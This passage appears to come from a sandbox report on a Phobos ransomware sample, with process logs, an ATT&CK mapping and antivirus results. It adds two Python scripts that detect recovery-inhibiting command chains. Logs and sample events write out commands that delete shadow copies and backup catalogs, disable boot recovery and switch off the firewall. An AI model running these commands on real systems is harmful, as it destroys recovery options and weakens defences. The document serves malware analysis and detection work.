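    rate down without missing the sequence.
    """
    hits = {}
    for ev in events:
        for name, _tech in match_rules(ev):
            hits.setdefault(name, []).append(ev)
    if len(hits) >= min_distinct_rules:
        verdict = "ransomware_inhibition_sequence"
    elif hits:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return verdict, hits


# Constructed sample events; command lines are the ones reported above.
FAST = r"C:\Users\user\Desktop\Fast.exe"
CMD = r"C:\Windows\System32\cmd.exe"
SAMPLE_EVENTS = [
    ProcEvent(FAST, CMD, r"C:\Windows\system32\cmd.exe"),
    ProcEvent(CMD, r"C:\Windows\System32\vssadmin.exe", "vssadmin delete shadows /all /quiet"),
    ProcEvent(CMD, r"C:\Windows\System32\wbem\WMIC.exe", "wmic shadowcopy delete"),
    ProcEvent(CMD, r"C:\Windows\System32\bcdedit.exe",
              "bcdedit /set {default} bootstatuspolicy ignoreallfailures"),
    ProcEvent(CMD, r"C:\Windows\System32\bcdedit.exe", "bcdedit /set {default} recoveryenabled no"),
    ProcEvent(CMD, r"C:\Windows\System32\wbadmin.exe", "wbadmin delete catalog -quiet"),
    ProcEvent(CMD, r"C:\Windows\System32\netsh.exe", "netsh advfirewall set currentprofile state off"),
    ProcEvent(CMD, r"C:\Windows\System32\netsh.exe", "netsh firewall set opmode mode=disable"),
    # constructed benign control: an administrator only listing shadow copies
    ProcEvent(CMD, r"C:\Windows\System32\vssadmin.exe", "vssadmin list shadows"),
]

if __name__ == "__main__":
    verdict, hits = assess(SAMPLE_EVENTS)
    print(f"verdict: {verdict}")
    for name, evs in hits.items():
        for ev in evs:
            flag = " (parent in user-writable path)" if parent_is_user_writable(ev) else ""
            print(f"  {name}: {ev.command_line}{flag}")
```

The regexes deliberately allow an optional ".exe" and a full path before the tool name, because the same commands are often logged with the image path rather than the bare name; the benign "vssadmin list shadows" control does not match because no rule fires without the destructive verb.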
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeCode function: 2_2_00CA77DF InitializeCriticalSectionAndSpinCount,EnterCriticalSection,QueryPerformanceCounter,QueryPerformanceCounter,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,GetLocalTime,SystemTimeToFileTime,QueryPerformanceCounter,LeaveCriticalSection,2_2_00CA77DF
Source: C:\Users\user\Desktop\Fast.exeCode function: 2_2_00CA3E39 GetVersion,GetCurrentProcess,OpenProcessToken,GetTokenInformation,FindCloseChangeNotification,2_2_00CA3E39

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\wbadmin.exe  wbadmin delete catalog -quiet
Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\netsh.exe  netsh advfirewall set currentprofile state off
Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\netsh.exe  netsh advfirewall set currentprofile state off
Source: Fast.exe, 00000000.00000003.2693227210.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.2705225457.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.2767513749.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.2087557131.0000000003880000.00000004.00000800.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.2759247777.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.2541928422.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.2610693445.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.2463498210.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.2832712204.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.2750402428.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.2835072519.0000000000B30000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Fast.exe
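The two process creations above (wbadmin deleting the backup catalog, netsh switching the current firewall profile off) together with the vssadmin, bcdedit and WMIC activity the report's signatures name are the recovery-inhibition chain that precedes encryption. The following is an added detection example written for this page; it is not code from the Joe Sandbox report or from the sample. It runs command-line rules over process-creation events and then correlates them by parent PID, so a single cmd.exe spawning several distinct recovery-inhibiting children fires a higher-confidence alert than any one command would. The event field names (pid, ppid, image, command_line) are an assumption modelled on Sysmon Event ID 1 / Security 4688 records; the wbadmin and netsh command lines are the ones shown above, while the vssadmin, bcdedit and wmic lines are constructed samples of the techniques the signatures describe, not command lines taken from this page.

```python
import re
from collections import defaultdict

# Added example; not code from the Joe Sandbox report or from Phobos.
# Each rule: name, ATT&CK technique, expected image basename, regex over the command line.
RULES = [
    ("wbadmin backup catalog deletion", "T1490", "wbadmin.exe", r"\bdelete\s+catalog\b"),
    ("vssadmin shadow copy deletion", "T1490", "vssadmin.exe", r"\bdelete\s+shadows\b"),
    ("wmic shadow copy deletion", "T1490", "wmic.exe", r"\bshadowcopy\b.*\bdelete\b"),
    ("bcdedit recovery disabled", "T1490", "bcdedit.exe", r"\brecoveryenabled\s+no\b"),
    ("netsh firewall profile disabled", "T1562.004", "netsh.exe",
     r"\badvfirewall\s+set\s+\w+\s+state\s+off\b"),
]
COMPILED = [(name, tech, image, re.compile(rx, re.IGNORECASE)) for name, tech, image, rx in RULES]


def image_name(path):
    """Lower-cased basename of an image path: C:\\Windows\\System32\\wbem\\WMIC.exe -> wmic.exe."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def match_event(event):
    """Return (rule name, technique) for the first rule the event matches, else None.

    Matching the image basename as well as the command line keeps a renamed copy of
    cmd.exe echoing 'vssadmin delete shadows' from firing, and keeps the regexes short.
    """
    img = image_name(event["image"])
    for name, tech, expected_image, rx in COMPILED:
        if img == expected_image and rx.search(event["command_line"]):
            return name, tech
    return None


def detect(events, min_distinct=3):
    """Run every rule over the events and correlate hits by parent PID.

    Returns (hits, chains): hits is a list of (pid, rule name, technique); chains maps a
    parent PID to the sorted distinct rule names it triggered when that parent spawned at
    least `min_distinct` different matching children, which is the cmd.exe -> wbadmin /
    vssadmin / bcdedit / netsh pattern the report records for this sample.
    """
    hits = []
    by_parent = defaultdict(set)
    for ev in events:
        m = match_event(ev)
        if m:
            hits.append((ev["pid"], m[0], m[1]))
            by_parent[ev["ppid"]].add(m[0])
    chains = {ppid: sorted(rules) for ppid, rules in by_parent.items() if len(rules) >= min_distinct}
    return hits, chains


# Constructed sample events (field names assumed, see lead-in). The wbadmin and netsh
# command lines are the ones the report shows; the others are constructed examples.
SAMPLE_EVENTS = [
    {"pid": 1001, "ppid": 900, "image": r"C:\Windows\System32\wbadmin.exe",
     "command_line": "wbadmin delete catalog -quiet"},
    {"pid": 1002, "ppid": 900, "image": r"C:\Windows\System32\vssadmin.exe",
     "command_line": "vssadmin delete shadows /all /quiet"},
    {"pid": 1003, "ppid": 900, "image": r"C:\Windows\System32\bcdedit.exe",
     "command_line": "bcdedit /set {default} recoveryenabled no"},
    {"pid": 1004, "ppid": 901, "image": r"C:\Windows\System32\netsh.exe",
     "command_line": "netsh advfirewall set currentprofile state off"},
    {"pid": 1005, "ppid": 902, "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "command_line": "wmic shadowcopy delete"},
    # Benign: an operator listing shadow copies must not fire.
    {"pid": 1006, "ppid": 903, "image": r"C:\Windows\System32\vssadmin.exe",
     "command_line": "vssadmin list shadows"},
]

if __name__ == "__main__":
    hits, chains = detect(SAMPLE_EVENTS)
    for pid, rule, tech in hits:
        print(f"pid {pid}: {rule} [{tech}]")
    for ppid, rules in chains.items():
        print(f"parent {ppid} spawned {len(rules)} distinct recovery-inhibiting children: {rules}")
```

The per-command rules are noisy on their own (backup operators run vssadmin and wbadmin legitimately); the parent-PID correlation in `detect` is what turns them into a ransomware pre-encryption alert, and `min_distinct` is the knob to tune against your own baseline.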
MITRE ATT&CK matrix, listed per tactic (the matrix was flattened in extraction). A bracketed number is the count badge the report attaches to a matched technique; techniques without a badge are matrix cells with no matching signature.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Scheduled Task/Job [1]; Native API [11]; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: Scheduled Task/Job [1]; Registry Run Keys / Startup Folder [121]; DLL Side-Loading [1]; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: Access Token Manipulation [1]; Process Injection [11]; Scheduled Task/Job [1]; Registry Run Keys / Startup Folder [121]; DLL Side-Loading [1]; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading [113]; Disable or Modify Tools [2]; Virtualization/Sandbox Evasion [12]; Access Token Manipulation [1]; Process Injection [11]; Hidden Files and Directories [1]; DLL Side-Loading [1]; File Deletion [2]
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: System Time Discovery [1]; Security Software Discovery [131]; Virtualization/Sandbox Evasion [12]; Process Discovery [2]; Application Window Discovery [1]; File and Directory Discovery [2]; System Information Discovery [23]; System Owner/User Discovery
Lateral Movement: Taint Shared Content [1]; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Archive Collected Data [1]; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Encrypted Channel [1]; Ingress Tool Transfer [1]; Steganography; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Inhibit System Recovery [1]; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior Graph (ID 1388428, sample Fast.exe, start date 07/02/2024, architecture WINDOWS, score 100)

Top-level signatures: Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for dropped file; 7 other signatures.

Process tree (node numbers as in the graph; where the graph gives two counts they are registry values / files created, per the graph legend):

  Fast.exe [7] (1 / 501)
    dropped: C:\ProgramData\Microsoft\Windows\...\Fast.exe (PE32); v8_context_snapsho...el61@gmx.com].eight (data); snapshot_blob.bin....el61@gmx.com].eight (data); 38 other files (34 malicious)
    signatures: Creates files in the recycle bin to hide itself; Drops PE files to the startup folder; Writes many files with high entropy; Infects executable files (exe, dll, sys, html)
    cmd.exe [17]
      signatures: May disable shadow drive data (uses vssadmin); Deletes shadow drive data (may be related to ransomware); Uses netsh to modify the Windows network and firewall settings; 3 other signatures
      vssadmin.exe [25]: Deletes shadow drive data (may be related to ransomware)
      bcdedit.exe [28] (9 / 1)
      bcdedit.exe [30] (8 / 1)
      3 other processes
    Fast.exe [20] (2 / 6)
      dropped: C:\Users\user\AppData\Roaming\...\Fast.exe (PE32); C:\Users\user\AppData\Local\Fast.exe (PE32)
    cmd.exe [23]
      netsh.exe [32]
      netsh.exe [34]
      conhost.exe [36]
  Fast.exe [11]
    signatures: Multi AV Scanner detection for dropped file; Found evasive API chain (may stop execution after checking locale)
  wbengine.exe [13]
    signatures: Creates files inside the volume driver (system volume information)
  5 other processes

Antivirus detection, submitted file (Source / Detection / Scanner / Label):
  Fast.exe   89%   ReversingLabs    Win32.Ransomware.Phobos
  Fast.exe   100%  Avira            TR/Crypt.XPACK.Gen
  Fast.exe   100%  Joe Sandbox ML

Antivirus detection, dropped files (Source / Detection / Scanner / Label):
  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Fast.exe                   89%  ReversingLabs  Win32.Ransomware.Phobos
  C:\Users\user\AppData\Local\Fast.exe                                                    89%  ReversingLabs  Win32.Ransomware.Phobos
  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exe    89%  ReversingLabs  Win32.Ransomware.Phobos

No Antivirus matches in the remaining categories.
No contacted domains info.
URLs (Name / Source / Malicious / Antivirus Detection / Reputation):
  http://www.unicode.org/copyright.html   source: icudtl.dat.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight.0.dr   malicious: false   reputation: high

The only URL the report extracted is the Unicode copyright notice left inside the ICU data file (icudtl.dat) that the sample encrypted and renamed; it is a residual string of the victim file, not a contact address of the sample. No contacted IP infos.
    Joe Sandbox version:40.0.0 Tourmaline
    Analysis ID:1388428
    Start date and time:2024-02-07 16:10:06 +01:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 11m 47s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed:28
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:Fast.exe
    Detection:MAL
    Classification:mal100.rans.spre.adwa.evad.winEXE@29/162@0/0
    EGA Information:
    • Successful, ratio: 100%
    HCA Information:
    • Successful, ratio: 98%
    • Number of executed functions: 37
    • Number of non-executed functions: 113
    Cookbook Comments:
    • Found application associated with file extension: .exe
    • Override analysis time to 240s for sample files taking high CPU consumption
    • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, VSSVC.exe, svchost.exe
